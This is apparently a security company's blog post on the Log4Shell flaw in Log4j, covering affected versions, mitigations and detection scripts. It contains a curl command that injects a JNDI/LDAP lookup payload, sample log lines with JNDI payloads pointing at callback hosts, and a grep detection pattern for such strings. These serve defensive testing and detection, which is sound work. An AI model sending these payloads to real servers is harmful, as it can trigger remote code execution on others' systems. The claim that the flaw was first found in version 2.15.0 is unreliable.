Security for everyone

Log4Shell: Log4j 0-day Remote Code Execution Vulnerability (CVE-2021-44228 & CVE-2021-45046)

SecurityForEveryone


23/Dec/21

Log4j is a Java logging library that lets developers log messages from their applications. A vulnerability has been found in Log4j that could allow an attacker to execute arbitrary code. It lies in the way Log4j handles JNDI lookups: an attacker who can get an LDAP-style lookup string into a logged message can execute arbitrary code loaded from an LDAP server when message lookup substitution is enabled. This vulnerability was first discovered in version 2.15.0, but has been fixed in later versions. Versions 2.17.0 and later completely remove this functionality.

What is Log4Shell or Log4j?

Recently, a critical vulnerability was found in the Apache Log4j 2 library, which is used by a great many applications. The vulnerability allows remote code execution, carries the highest possible criticality score (CVSS score 10) and has been published as CVE-2021-44228. Because Log4j 2 is used by so many applications and the impact is complete compromise of the server, it is also known as “Log4Shell”.

The vulnerability was first made public, together with its PoC code, in a tweet on December 9:

Immediately after this tweet, various exploits for the vulnerability were shared on different platforms.

Who got affected by this vulnerability?

Once the vulnerability was published, many services turned out to be exploitable, including reputable cloud services such as Steam and Apple iCloud and applications such as Minecraft. You can find the extensive list of affected large corporations here. Since this vulnerability has the highest level of criticality, it is expected to be the cause of large data breaches that may occur in the future. You can learn about the Impact of Cybersecurity Breaches to Your Business in our blog. A Twitter user showed that Apple servers were affected simply by changing the name of an iPhone device.

If you are using an older version of Log4j, it is important to upgrade as soon as possible to protect your system from potential attacks. If you cannot upgrade for some reason, it is recommended to disable log message lookup substitution completely. Servers with JDK versions later than "6u211", "7u201", "8u191" and "11.0.1" are not affected by the LDAP attack vector; however, different PoC codes have shown that they are vulnerable to other attack vectors. As an example, this article discusses an attack that targets the org.apache.naming.factory.BeanFactory class shipped with Apache Tomcat servers.

Which versions of Apache Log4j are affected?

Almost all log4j versions are affected by this vulnerability.

2.0-beta9 <= Apache log4j <= 2.16.0

As the Security for Everyone team, we suggest updating to version 2.17.0.

What precautions you can take against Log4Shell?

Log4j is a widely used logging library, so it is important to be aware of this vulnerability and take the necessary precautions to protect your system. As the Security for Everyone team, we suggest updating to version 2.17.0, which does not have this vulnerability, as the definitive solution. You can use the following links for the update process:

Because the library is so widely used, and updating a service may be slow because of the library's dependencies, we suggest the following actions as temporary measures:

  • You can block the requests crafted by attackers by writing rules in your Web Application Firewall.
  • You can disable the feature that allows remote code execution through log4j message lookups. To do that, set the log4j2.formatMsgNoLookups system property (or the equivalent LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable) to "true".
  • If possible, you can remove the log4j library completely.
  • You can disable JNDI queries. To do that, remove the JndiLookup and JndiManager classes from "log4j-core.jar".
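As an added example of checking the two points above (the affected version range and the "remove JndiLookup" mitigation), written for this post and not a Security for Everyone tool: it reads the Maven version from a log4j-core jar image, tests it against the 2.0-beta9 to 2.16.0 range, and reports whether JndiLookup.class is still inside. The jar used here is a constructed fixture, not a real build.

```python
import io
import re
import zipfile

POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def parse_version(text):
    """Turn '2.0-beta9' or '2.16.0' into a comparable tuple. A final release sorts
    after a pre-release of the same number; qualifiers are compared as plain strings."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z0-9]+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {text!r}")
    major, minor, patch, qualifier = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if qualifier else 1, qualifier or "")

# Affected range stated above: 2.0-beta9 <= log4j-core <= 2.16.0.
AFFECTED_LOW = parse_version("2.0-beta9")
AFFECTED_HIGH = parse_version("2.16.0")

def assess_jar(jar_bytes):
    """Read the Maven version from a log4j-core jar image and check whether
    JndiLookup.class (the class the mitigation removes) is still inside it."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_jndi_lookup = JNDI_LOOKUP_CLASS in names
    in_range = version is not None and AFFECTED_LOW <= parse_version(version) <= AFFECTED_HIGH
    return {
        "version": version,
        "affected_version": in_range,
        "jndi_lookup_present": has_jndi_lookup,
        # An affected version that no longer ships the lookup class has had the
        # "remove JndiLookup" mitigation applied and is not flagged as vulnerable.
        "vulnerable": in_range and has_jndi_lookup,
    }

def build_sample_jar(version, include_jndi_lookup):
    """Constructed fixture: a minimal zip shaped like log4j-core, not a real jar."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(POM_PROPERTIES, f"version={version}\ngroupId=org.apache.logging.log4j\n")
        if include_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
    return buf.getvalue()
```

On a real host, point `assess_jar` at each log4j-core jar found on disk (including jars nested inside wars) instead of the fixture.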

How can I detect Log4J Vulnerabilities extensively?

You can detect whether one of your servers is affected by this vulnerability by triggering a DNS query: the test payload makes the server try to fetch code from a remote host, and the name resolution that precedes that fetch is what you observe. You can either use a free online DNS logging tool (which may let someone else learn that you have this vulnerability) or take the safer route of setting up your own server to detect whether the vulnerability was triggered.

You can generate a test payload with the CanaryTokens.org web application, which can send you an email when a vulnerable application triggers the token. The application generates a payload like the one given below. You can send it in the "X-Api-Version" HTTP header with the curl command line given below.

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://x${hostName}.L4J.RANDOM_STRING.canarytokens.com/a}'

Easier Way To Detect Log4Shell Vulnerabilities Extensively - Online Log4j Vulnerability Scanner Tools

There are easier ways to detect Log4Shell: scan for Log4j with the Log4j vulnerability scanner tools we have prepared for you.

Security For Everyone's Log4J/Log4Shell Vulnerability Scanner Tools:

You can use the following command to detect whether exploitation attempts against your servers have already been logged:

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log/
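As an added example (written for this post, not a tool from the page), the same pattern the command above greps for, applied in Python to a few constructed access-log lines so that each hit is broken out into source address, lookup scheme and callback host for triage:

```python
import re

# Same lookup pattern as the egrep command, with named groups for the scheme and the
# callback host so each hit can be triaged and the host added to a block list.
JNDI_PATTERN = re.compile(
    r"\$\{jndi:(?P<scheme>ldaps?|rmi|dns):/+(?P<host>[^/:}\s]+)[^}\n]*\}?",
    re.IGNORECASE,
)

# Constructed sample lines in a typical access-log shape (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"
10.0.0.9 - - [10/Dec/2021:03:14:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "${JNDI:RMI://callback.example/x}"
10.0.0.12 - - [10/Dec/2021:03:14:15 +0000] "GET /api HTTP/1.1" 200 512 "-" "${jndi:dns://x.L4J.token.example/a}"
10.0.0.5 - - [10/Dec/2021:03:15:01 +0000] "GET /static/app.js HTTP/1.1" 304 0 "-" "Mozilla/5.0"
"""

def scan_log(text):
    """Return one finding per matching line: line number, source IP (first token),
    lookup scheme and callback host. Scheme is lower-cased so LDAP and ldap group together."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = JNDI_PATTERN.search(line)
        if not m:
            continue
        findings.append({
            "line": lineno,
            "source": line.split(" ", 1)[0],
            "scheme": m.group("scheme").lower(),
            "callback_host": m.group("host"),
        })
    return findings

def summarize(findings):
    """Count hits per (source, callback host): many hits from one source against one
    callback host is the signature of a scripted sweep rather than a one-off probe."""
    counts = {}
    for f in findings:
        key = (f["source"], f["callback_host"])
        counts[key] = counts.get(key, 0) + 1
    return counts

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"line {h['line']}: {h['source']} -> {h['scheme']}://{h['callback_host']}")
    print(summarize(hits))
```

A hit only proves that a lookup string reached the log; whether the server actually resolved or fetched from the callback host has to be confirmed from DNS and outbound connection logs.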

If you have any questions or concerns, please don't hesitate to contact us. You can request a pentest from our team of highly trained cybersecurity experts or learn How Ethical Hacking Could Optimize Your Cybersecurity. Stay safe online!
